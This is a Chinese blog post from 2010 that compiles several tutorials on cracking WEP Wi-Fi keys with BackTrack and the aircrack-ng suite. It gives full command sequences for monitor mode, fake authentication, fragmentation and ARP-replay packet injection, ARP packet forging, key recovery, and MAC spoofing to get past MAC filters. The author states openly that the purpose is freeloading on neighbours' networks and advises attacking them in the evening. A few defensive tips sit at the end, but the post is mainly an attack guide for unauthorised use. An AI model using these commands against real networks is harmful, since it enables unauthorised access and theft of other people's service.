Chinaunix首页 | 论坛 | 博客
  • 博客访问: 52855
  • 博文数量: 6
  • 博客积分: 900
  • 博客等级: 准尉
  • 技术积分: 165
  • 用 户 组: 普通用户
  • 注册时间: 2006-04-13 15:19
文章分类

全部博文(6)

文章存档

2011年(1)

2010年(2)

2009年(2)

2008年(1)

我的朋友
最近访客

分类: LINUX

2010-06-01 16:58:54

 

1.破解无线网络的工具bt3或者bt4工具的官方网站:

   在官方网站中有最新版本的backtrack 工具的镜像文件下载链接。

2.要用图形化的工具spoonwep或spoonwpa,还需要下载一个allspoon.deb文件,最好在刻录光盘之前使用ultraiso工具将allspoon.deb文件放进去。

3.刻录光盘

4.设置电脑为通过光盘引导

5.选择光盘启动以后启动项中的第一项

6.输入startx进图形界面

7.点屏幕最下角第五个图标,kconsole,输入cd /cdrom

8.如果在第二步将allspoon.deb放在了光盘的根目录,执行dpkg -i allspoon.deb 安装

9.安装以后可以在桌面上看到多出来两个图标,貌似第二个针对wep的破解程序有点小问题,需要先运行一次spoonwpa工具来产生一个mon0设备才可以破解。先运行spoonwpa,选择mon0设备,选择normal mode,选择unkown victem,选择next,点击launch.开始

___________________________________________________________________________

1、ifconfig -a
查看无线网卡名字及MAC地址记录下来,如果没看到有无线网卡,可以使用iwconfig命令,查看是否有加载。
为了方便也可以改自己的网卡MAC,为了以后输入方便。输入macchanger -m 00:11:22:33:44:55 wlan0回车,后又输入了一次
ifconfig -a 查看了下网卡MAC已经更改为00:11:22:33:44:55。(也可以输入ifconfig eth1 up hw ether 00:11:22:33:44:55
来修改自己的网卡mac)
2、airmon-ng start wlan0 6
这个命令用于将自己的无线网卡置于监控模式,即类似一个AP的效果,因此可以抓到别人的包。
其中 wlan0 是无线网卡名字的 ,在第一个ifconfig -a命令可以看得到。wlan0 后面的那个6是需要破解的AP的频道,可以在最前面
的图上看到,或者是在windows下先把要破解对象的相关信息抄下来。
运行命令成功以后,你会看到返回的提示显示出现一个wlan0(如果你是卡王和卡皇无线网卡的话就是这个,其他的可能不同,不过
一般都是XXX1)
3、airodump-ng --ivs -w pack -c 6 wlan0

这个命令会列出所有该频道的AP。
其中,6 是指你需要监控的频道,必须和第二个命令里的一样,wlan0是刚才第二步出现的网卡名字。
这个命令运行以后,显示的内容比较多,简单介绍一下:
BSSID :是AP的Mac 地址
PWR: AP信号的大小,如果低于10,丢包情况严重,比较难破解
RXQ: 干扰的大小
Beacons:发送接受的包,参考信息,在跳说明有数据
#Data: 这个比较重要,是接受到可以用来破解的特殊包,如果一直不变,那么,说明没有客户端连接,破解可能很麻烦,如果对方
有大文件在下载,那么这个跳的速度非常快,几分钟就可以有足够的包来破解了,如果跳得很慢,那么,就需要用注入的方式来获取
包了。
CH:频道
MB:网络连接速度 54就是54MB
ENC, CIPHER,AUTH
这些是加密方式,我们这次只讨论显示为WEP
如果显示 WPA TKIP 啥的,只能密码穷举破解,个人认为希望不大。
ESSID: 这个是AP的名字,需要用到的。如果是中文的话可以下载一个中文包,下载地址
过一会儿,下面会显示哪些客户端连接到了哪些AP,针对有些Mac地址加密的,很容易模拟对方客户端的Mac从而骗进去,所以不要简
单地相信Mac限制功能。
这个窗口就开着好了,不用关闭,以后的命令,需要重新打开一个终端窗口(shell)操作。
4、aireplay-ng -1 0 -e ap_essid -a ap_mac -h pc_mac wlan0
这一步开始,我们要做一些真正的破解工作,主要是针对那些客户端仅仅连接,没什么流量的AP,这种AP,#Data的增长非常慢,往
往需要很长的时间才有可能取得足够的包(一般5位的密码需要10000个包左右,更多的密码就要更多的。。。。)这个时候就需要
aireplay-ng 出面了,顾名思义,这个软件就是 Replay,也就是说,模拟发包。
首先解释命令:
-e ap_essid就是 -e 之后加上你需要破解的ESSID,比如 TP-LINK , linksys,注意大小写。
-a ap_mac?? 就是 -a 之后加上你需要破解的AP的Mac地址。
-h pc_mac 就是 -h 之后,加上你的无线网卡的 Mac地址, 在第一步你可以得到。
wlan0 ,上面解释过了。
举个例子:
aireplay-ng -1 0 -e Tp-link -a 001900123456 -h 001900345678 wlan0
这一条命令,是用欺骗的方式,连接上那个AP,因此,如果网络信号不好,可能会执行不成功。
如果成功了,那么会显示Successful :-] 字样。如下图。否则,让信号强度大于10。
5、aireplay-ng -5 -b ap_mac -h pc_mac wlan0
上一条成功以后,我们需要开始收集那些需要的数据包,才能够进行模拟,并且破解。
所谓的需要的数据包,就是 #Data的数据,如果 #Data一直是0,那么可能会很麻烦,最好的情况是 #Data缓慢增长的这种情况。
解释一下
-b ap_mac 就是你需要破解的AP的Mac 地址。
-h pc_mac?? 就是你自己网卡的Mac地址。
wlan0就是你自己网卡名字同上面一样。
这一条命令的执行,和#data包有关,如果#Data 没有增加,则这个命令会一直执行,直到捕获一个#Data包。
捕获以后,程序会问你是否需要用这个包来模拟攻击。回答Y即可。
如果攻击成功,则会显示成功,失败往往是因为信号太差造成的, 如果攻击失败(往往是捕获的包有问题),程序重试N次以后,或
自动重新开始捕捉包,继续进行即可。
等成功完成以后,会显示一个文件名:fragment-XXXXX-XXXXXX.xor
这个文件名,XXXXX里面是数字,是一个文件。下一部会用得到。
这一步是最有可能失败的一步,尽量保持信号好一点。
6、packetforge-ng -0 -a ap_mac -h pc_mac -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
第六步,参数比较多,解释一下:
-a ap_mac 是待破解的AP的Mac地址,
-h pc_mac?? 是你自己的无线网卡Mac地址
fragment-XXXXX-XXXXXX.xor?? 就是上一步显示的那个文件名。
这一步会很快做完, 显示生成文件到 mrarp啥的,其实就是破解包的准备过程。对了这里的-l是字母不是数字1。
7、aireplay-ng -2 -r mrarp -x 256 wlan0
这一步没哈可以修改的,参数解释一下
wlan0 是 你的无线网卡的名字
256是攻击速度,1024是最大值,个人建议设为256 ,或128这样不容易死掉。
这一步执行后,你会看到第一个终端窗口(shell)里面,你破解的那个AP后面的#Data在飞速增长,我们只需等待十几秒数据包就冲到
5位数字以上了。如果第一个终端窗口(shell)里面的#Data没有在飞速增长的话那就是你操作时出了错误。
8、我们可以新打开一个终端窗口,当 #Data达到 10000个的时候,就可以测试破解了,很多密码都可以 10000左右#Data就算出来
新窗口中运行:
aircrack-ng -n 64 -b ap_mac pack-01.ivs
解释一下,
64 AP使用的是64位加密,如果是128的话把64改成128
-b ap_mac 对方AP的Mac地址
pack-01.ivs 其实是第三步自动生成的一个文件, 如果你多次运行了第三步,那么,可能会生成多个 pack-XX.ivs文件, 你可以到
对应的文件夹里看一下(就在桌面上的第一个文件夹图标里),找到XX最大的那个,就是你当前正在使用的这个文件。
运行以后,如果运气好,一般10000个#Data就可以破解出来密码,同时会显示 对应的Ascii码,如果不是标准Ascii码就是一串数字,记录下来,开始你的蹭网旅程!

____________________________________________________________________________

wep密码的破解不是一个新鲜事物了,实际从年前开始就已经有所研究,限于当时设备条件及BT系列系统的不成熟,一直没有办法动手实践。随着女友宽带到期日的临近及越来越严重的经济危机影响。遂动手开始了“蹭网”的实战。原想这种不光彩的勾当用私有博客写,后想反正也是匿名的,就不要脸一回了。就当是为推广网络安全知识了,各位回家可以把无线路由的加密方式改为wpa以防范风险。

1,利用linux系统u盘写入工具把bt4的iso文件写入到u盘中,然后替换model夹子里面的一些lzm文件,使其汉化

ps:这个工具的名字是UNetbootin。是windows下使用的工具专门把用来把linux安装镜像安装到硬盘或u盘上。下载地址是

2,重新启动改为u盘启动,菜单选第一个,用户名root 密码 toor

3,输入命令startx 进入桌面环境

4,因为兼容问题spoonweb2不能显示2200的网卡,输入以下命令解决

ln -fs bash /bin/sh;再输入:ls -al /bin/sh (这个命令可以显示是否设置成功,显示bash为成功,dash为失败)

5,在命令行输入spoonwep进入。

6,进入spoonwep后,选择eth1即第二块网卡(2200bg无线网卡)如不确定哪个是无线网卡,可以用ifconfig -a命令查看所有网卡。第二个选项选择normal,第三个选择不确定的路由。

7,确定后进入下一页签,左上角有两个选项,分别代表不确定的频道和确定频道,这里指要搜索的ap的所在频道,我要破解的是6,所以选择固定频道,然后后面选择6.

8,点搜索按钮后,稍等片刻,后面即会出现ap的列表,clis打钩的ap代表有活动客户端可以采集破解数据的。选择这个ap后,在下面的活动客户端中选择一个包比较多的。】

9,点破解按钮开始破解,但是2200bg和其他一些网卡这时不会采集数据,必须点一下abort取消按钮,然后再点破解按钮。这样数据就开始采集了。剩下的就是等了。

10,数据采集到大概10000以上ivs以后,基本就出现key found了。

11,key是16进制的形式显示的,要用小工具将16进制转为阿斯科码。如33转换为3. 到这里就全部完成了。

ps:以上教程仅适合ap上有活动的客户端时进行破解,如何判断有无客户端连接可参照第8点。

如果是在自己的ap上测试,请使用两台笔记本,一台正常连接ap进行下载,模拟客户端。另一台运行bt4进行破解。如果是周围其他人的ap则最好在晚上8,9点有人使用上网时进行。

----------------------------------------------------------参考资料--------------------------------------------------

----------------------------------------------以下内容为参考资料,因2200对无客户端注入攻击的支持不太很好,以下的参考内容可能是在bt3测试版下操作。如不是必须请按正文的有客户端方式破解-------------------------------------------------------------------------------------------------------------------------

参考网址

http://blog.sina.com.cn/s/blog_48964b120100c7yg.html

Intel 5100网卡BT4破解WEP密码经验分享
我本本的网卡是Intel 5100的,Widows下的软件几乎用不了,令人烦的是BT3也认别不了。还好现在出的BT4能认别我的网卡。
   作为一个菜鸟的我,现在还不喜欢输入老长的代码,用了spoonwep2。我用的是光盘启动,我先用UltraISO把spoonwep2放在BT4\modules\下,然后刻盘。
   开机启动进按F12进入光盘启动,用户名root;密码toor(这个不会显示);然后startx进入图形界面。
   先开一个shell,输入ifconfig -a会发现wlan0的网卡,就是我的5100网卡了。由于BT4与spoonwep还有一些兼容的问题,直接开spoonwep是不会发现我的网卡的。这时候,要输入ln -fs bash /bin/sh;再输入:ls -al /bin/sh (这个命令可以显示是否设置成功,显示bash为成功,dash为失败)。打开spoonwep2,里面可以找到网卡了。先选wlan0进入搜索,但这时不会搜出来什么,我也不知道怎么回事。需要关一下spoonwep2再开一下,这时网卡项里有一个mon0的,选这个就可以完成破解了。
   按述方法选好网卡,搜索,找一个data跑的比较快的AP,选择,再选Fragment攻击,点开始,就开始等了。还好,我第一个试的,IVS包跑得很快,估计在下东西。大概过了3min有40000多个IVS,破出来了,是一个128bit的WEP密码。
由于是光盘下启动,没有图,不好意思。
本贴来自天极网群乐社区--

四、输入airmon-ng start eth1 8 开启网卡的Monitor模式并工作在8频道(因为AP工作在8频道,可提前用airodump-ng eth1查看下AP的工作频道)
五、由于使用的是BT3的测试版,2200BG无线网卡需要打补丁,输入
modprobe ipw2200 rtap-iface=1
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
2200BG无线网卡补丁打好了
----------------------------------------------------------------------------------------

使用2200BG无线网卡破解无客户端AP的wep密码教程
一、准备环境:DELL510M笔记本,自带INTEL2200BG网卡,BT3 beta硬盘版。
二、启动BT3,输入root/toor进行,再输入xconf/startx进入图行界面。
三、打开一个shell窗口,输入ifconfig -a查看自己的网卡情况,从显示来看自己的网卡接口型号为eth1


四、输入airmon-ng start eth1 8 开启网卡的Monitor模式并工作在8频道(因为AP工作在8频道,可提前用airodump-ng eth1查看下AP的工作
频道)
五、由于使用的是BT3的测试版,2200BG无线网卡需要打补丁,输入
modprobe ipw2200 rtap-iface=1
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
2200BG无线网卡补丁打好了
六、修改自己的网卡MAC,为了以后输入方便。输入macchanger -m 00:11:22:33:44:55 eth1回车,后又输入了一次ifconfig -a 查看了下网卡

MAC已经更改为00:11:22:33:44:55。(也可以输入ifconfig eth1 up hw ether 00:11:22:33:44:55来修改自己的网卡mac)
七、输入airodump-ng --ivs -w name(自己随便起个名字) -c 8 eth1,开始查看AP的活动情况
这个命令比较关键,你运行以后,就会列出所有该频道的AP。
其中,6 是指你需要监控的频道,必须和第二个命令里的一样, ath1是刚才第二步出现的别名。
这个命令运行以后,显示的内容比较多,简单介绍一下:
BSSID : 其实就是AP的Mac 地址
PWR: AP信号的大小,一般,低于10,就比较麻烦了,丢包情况严重,比较难破解
RXQ: 干扰的大小
Beacons:发送接受的包,参考信息,在跳说明有数据
#Data:这个比较重要,是接受到可以用来破解的特殊包,如果一直不变,那么,说明没有客户端连接,破解可能很麻烦,如果对方有大文件在
下载,那么这个跳的速度非常快,10来分钟就可以有足够的包来破解了,如果跳得很慢,那么,就需要用一些特殊的方式来破解了。
CH:频道
MB:网络连接速度 54就是54MB
ENC, CIPHER,AUTH
这些是加密方式,我们这次只讨论显示为   WEP 和 WEP+ OPN的
如果显示 WPA TKIP 啥的,只能密码穷举破解,个人认为希望不大。
ESSID: 这个是AP的名字,需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解,可以用中文的ESSID


八、由于AP没有合法的客户端,而且2200也不支持-1的虚拟连接,因此按照中卫的教程使用了-4命令。
输入aireplay-ng -4 -b AP的mac -h 001122334455 eth1,系统回显use this packet?时输入y回车,开始注入
这一条命令,是用欺骗的方式,连接上那个AP,因此,如果网络信号不好,可能会执行不成功。
如果成功了,那么会显示Successful :>   字样。否则,请让信号强度大于10。


九、一段时间后得到重要的*.xor文件


十、使用packetforge-ng命令提取xor文件里的prga并伪造arp包,输入packetforge-ng -0 -a AP的mac -h 001122334455 -k 255.255.255.255
-l 255.255.255.255 -y *.xor -w myrap(这里自己起个名字,我起的名字为myarp)回车,系统回显worte packet to:myarp
十一、使用-2命令开始攻击,data开始猛涨,输入命令:aireplay-ng -2 -r myrap eth1 (这里的myarp就是前面自己起的名字),系统回显:use this packet?输入y回车,data开始猛涨。


十二、当data到30000条后开始使用aircrack-ng -n 64 123456-01.ivs攻击,结果由于笔记本内存不够,花屏了,需提前将得到的*.ivs文件备份到了硬盘。所以从新启动bt3后,将硬盘的ivs文件复制到root下后,返回命令行界面
直接使用aircrack命令开始破解,并顺利拿到了密码,因为是命令行模式,就没有办法截图了。(这里提供给一些内存小的笔记本一用aircrack就花屏的方法,当有足够多的data 时,可以直接按ctrl+alt+f1(f1到f5中随便一个),可以直接退到命令行模式,输root/toor后直接在命令行模式下用aircrack命令破解吧,这样不会再画屏了)。

另外忘记备注一条,前面在输入airodump-ng --ivs -w name -c 8 eth1这里的name我输入的是123456,这样回在root文件夹下生成一个123456-01.ivs的文件,也就是最后用aircrack破解的文件。不知道名字的可以在破解前用ls命令查看下,就会得到他的全名或直接就输入*.ivs。
运行以后,如果运气好,一会儿就会显示破解出来的密码,同时会显示对应的Assic码,如果不是标准Assic码,就是一串数字,记录下来。至此我们成功使用2200BG无线网卡破解无客户端AP的wep密码。

_____________________________________________________________

首先列出破解主要步骤[WEP 破解]

1) ifconfig -a

2) airmon-ng start wifi0 6

3) airodump-ng –ivs -w name -c 6 ath1

4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1

-1 is -one

5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

新的第5步: aireplay-ng   -3   -b ap_mac -h XXXXXXXXXX -x   1024   ath1

6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp

7) aireplay-ng -2 -r mrarp -x 1024 ath1

aircrack-ng -n 64 -b ap_mac name-01.ivs

以下对上述步骤一一解释:

(运行这些命令都需要打开终端窗口,可以使用Ctrl+C 从文本文件Copy, 然后Shift+Insert 粘贴入终端窗口)

1)ifconfig -a

这个命令用于找到自己的无线网卡的 Mac地址。请记录下来备用。

2) airmon-ng start wifi0 6

这个命令用于将自己的无线网卡置于Monitor 模式,即类似一个AP的效果,因此可以有抓别人包的功能。

其中 wifi0 是我电脑里面给无线网卡的 ,一般应该都是这个,第一个ifconfig -a命令可以看得到。

wifi0 后面的那个6 ,是需要破解的AP的频道,如果不知道,可以在事前左下角开始菜单里面,找到 第二项 Internet 下面的倒数第二个画着 无线网的一个工具,用它可以看到那些需要破解的AP的频道(Channel)。

运行命令成功以后,你会看到返回的提示显示出现一个 Ath1(如果你是 Athoes的无线网卡的话就是这个,其他的可能不同,不过一般都是XXX1这样)

这个就是你的用于破解的网卡代号

这个命令,简而言之,就是把你的无线网卡置于监控模式,并且指定监控的频道。

如果你发现弄错了频道,那么没关系,重新运行一遍就可以了,不过这个时候,可能就会变成 Ath2…Ath3 等等,但是好像最多运行三次,然后就会失败。

3) airodump-ng –ivs -w name -c 6 ath1

这个命令比较关键,你运行以后,就会列出所有该频道的AP。

其中,6 是指你需要监控的频道,必须和第二个命令里的一样, ath1是刚才第二步出现的别名。

这个命令运行以后,显示的内容比较多,简单介绍一下:

BSSID : 其实就是AP的Mac 地址

PWR: AP信号的大小,一般,低于10,就比较麻烦了,丢包情况严重,比较难破解

RXQ: 干扰的大小

Beacons:发送接受的包,参考信息,在跳说明有数据

#Data: 这个比较重要,是接受到可以用来破解的特殊包,如果一直不变,那么,说明没有客户端连接,破解可能很麻烦,如果对方有大文件在下载,那么这个跳的速度非常快,10来分钟就可以有足够的包来破解了,如果跳得很慢,那么,就需要用一些特殊的方式来破解了。

CH:频道

MB:网络连接速度 54就是54MB

ENC, CIPHER,AUTH

这些是加密方式,我们这次只讨论显示为   WEP 和 WEP+ OPN的

如果显示 WPA TKIP 啥的,只能密码穷举破解,个人认为希望不大。

ESSID: 这个是AP的名字,需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解,可以用中文的ESSID

过一会儿,下面会显示哪些客户端连接到了哪些AP,针对有些Mac地址加密的,很容易模拟对方客户端的Mac从而骗进去,所以不要简单地相信Mac限制功能。

这个窗口就开着好了,不用关闭,以后的命令,需要重新打开一个终端窗口操作。

4)aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1

这一步开始,我们要做一些真正的破解工作,主要是针对那些客户端仅仅连接,没什么流量的AP,这种AP,#Data的增长非常慢,往往需要很长的时间才有 可能取得足够的包(一般5位的密码需要10000个包左右,更多的密码就要更多的。。。。)这个时候就需要 aireplay-ng 出面了,顾名思义,这个软件就是 Replay,也就是说,模拟发包。

首先解释命令:

-e ap_essid   就是   -e 之后加上你需要破解的essid ,比如 TP-LINK , linksys 啥的,注意大小写。

-a ap_mac   就是   -a 之后加上你需要破解的AP的Mac地址,第三步BSSID就可以看得到。不需要 :哦。

-h XXXXXXXXXX 就是 -h 之后,加上你的无线网卡的 Mac地址, 在第一步你可以得到。

ath1 ,上面解释过了。

一个样板例子:

aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 ath1

这里有个小的建议,大家可以把以上的命令,都记录在一个文件里,然后把里面的XXXXXXXX都用自己的网卡Mac地址替换掉,这样就不需要每次都输入自 己的Mac地址了。每次都可以用Copy Paste的方式来输入,这样可以有效防止什么1 和 l , O和0 的混淆。

这一条命令,是用欺骗的方式,连接上那个AP,因此,如果网络信号不好,可能会执行不成功。

如果成功了,那么会显示Successful :>   字样。否则,请让信号强度大于10。

5)aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

上一条成功以后,我们需要开始收集那些需要的数据包,才能够进行模拟,并且破解。

所谓的需要的数据包,就是 #Data的数据,如果 #Data一直是0,那么可能会很麻烦,最好的情况是 #Data缓慢增长的这种情况。

解释一下

-b ap_mac 就是你需要破解的AP的Mac 地址,从第三步那里的 BSSID可以找得到。

-h XXXXXXXXXX   就是你自己网卡的Mac地址。

Ath1 和上面一样。。。。。

这一条命令的执行,和#data包有关,如果#Data 没有增加,则这个命令会一直执行,直到捕获一个#Data包。

捕获以后,程序会问你是否需要用这个包来模拟攻击。回答Y即可。

如果攻击成功,则会显示成功,失败往往是因为信号太差造成的, 如果攻击失败(往往是捕获的包有问题),程序重试N次以后,或自动重新开始捕捉包,继续进行即可。

等成功完成以后,会显示一个文件名:fragment-XXXXX-XXXXXX.xor

这个文件名,XXXXX里面是数字,是一个文件。马上会用得到。

这一步是最有可能失败的一步,尽量保持信号好一点。

6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp

第六步,参数比较多,解释一下:

-a ap_mac 是待破解的AP的Mac地址,

-h XXXXXXXXX 是你自己的无线网卡Mac地址

fragment-XXXXX-XXXXXX.xor   就是第五步显示的那个文件名。

这一步会很快做完, 显示生成文件到 mrarp啥的,其实就是破解包的准备过程。

7) aireplay-ng -2 -r mrarp -x 1024 ath1

这一步没哈可以修改的,参数解释一下

ath1 是 你的无线网卡的名字

1024 是攻击速度,1024是最大值了,如果你的无线网卡不是MiniPCI的,个人建议设为 512 ,这样不容易死机。

当这一步开始执行,你会看到 第一个终端窗口里面,你破解的那个AP后面的   #Data在飞速增长,一般是 200个/s的速度,我们只需等待即可

8)我们可以新打开一个终端窗口,当 #Data达到 10000个的时候,就可以测试破解了,很多密码都可以 10000左右#Data就算出来

新窗口中运行:

aircrack-ng -n 64 -b ap_mac name-01.ivs

解释一下,

-b ap_mac 对方AP的Mac地址

name-01.ivs 其实是第三步自动生成的一个文件, 如果你多次运行了第三步,那么,可能会生成多个 name-XX.ivs文件, 你可以到对应的文件夹里看一下(就在桌面上的第一个文件夹图标里),找到XX最大的那个,就是你当前正在使用的这个文件。

-n 64 是指破解64位的密码,如果10万以上Data都破解不出来,那就试试 -n 128,估计这个兄弟用了128位加密。

运行以后,如果运气好,一会儿就会显示破解出来的密码,同时会显示 对应的Assic码,如果不是标准Assic码,就是一串数字,记录下来,搞掂。

运气不好的情况,这个程序会继续等待更多的#Data,等到了,就会重新计算一次密码。

小结一下:

本教程只针对 WEP 密码的破解,而且,最好有得到认证的客户端连接在这个AP上,如果没有,有些AP(比如TP-LINK)能够被破解,某些可能就无法破解。

本教程也提供了 模拟Mac地址从而破解 Mac限制的方法

如果你需要你的AP很难被破解,建议:

1)用WPA 加密方式,并且使用不可能被字典猜到的密码,目前还是基本可靠的

2)如果只支持 WEP加密,那么,尽量考虑用隐藏 SSID的方式,这样可以增加破解难度

3)如果只支持 WEP加密,那么,可以考虑使用中文名字作为SSID,这样基本问题不大。

4)一般破解时候,大家都会选择常用的频道,例如 6频道, 第三步显示频道的时候,你的AP也会被列出来,那么第一个目标失败的时候,黑客往往会选择第二个容易下手的目标, 但是如果你选择了8、 4、这些奇怪的频道,那么狠客往往懒得重新进入该频道的监控模式,你就可以逃过一劫。不过, 某些廉价AP,往往对6 频道做了优化,这个频道信号最强….这就没办法了。

5)有空换换你的密码:)

又注:联入网络以后,你可以管理他的AP,进行一些优化啥的,往往AP的密码,可能就是WEP的密码。

补充:

其中第5步:

aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1 可以用新命令替代:

aireplay-ng   -3   -b ap_mac -h XXXXXXXXXX -x   1024   ath1

这一条命令可以自动地捕捉包,自动的发送包,自动的存为文件.

因此,这一步执行以后,如果开始正确的发收包,则可以看到 Data开始上涨,不过貌似速度会慢一点,用老命令的话,每秒500个增加,用新命令可能只有200个/秒

当足够多的数据包出现以后,可以直接运行第八步,跳过6\7两步.

**********************************************************************************************************************************

进入BT4系统

1:开第一个shell窗口,输入ifconfig -a 看到了瑞银网卡,显示为wlan0

2:输入ifconfig wlan0 up

再输入airmon-ng start wlan0   开启信道6的监听

3:输入airodump-ng –ivs -w name -c 6 mon0 截取数据包

7:建立虚拟连接:开第二个shell窗口,输入aireplay-ng -1 0 -a <目标AP MAC> -h <自己的瑞银MAC> mon0,当出现笑脸后连接成功

(这步很关键,不行的话就多试几次,输入iwconfig mon0 rate 2M 降低传输速度对建立连接有帮助)

8:aireplay-ng -2 -p 0841 -c ffffffffffff -b <目标AP MAC> -h <自己的瑞银MAC> mon0 进行交互式攻击。如成功输入Y确认

9:耐心等待第一个shell窗口的data的数字增加到1.5万以上

10:开第三个shell窗口,输入aircrack-ng -n 64 -b <目标AP MAC> name*.ivs

11:如果顺利,马上就能得到Key了

阅读(2734) | 评论(0) | 转发(0) |
0

上一篇:BT4网卡支持列表

下一篇:centos安装Xen4

给主人留下些什么吧!~~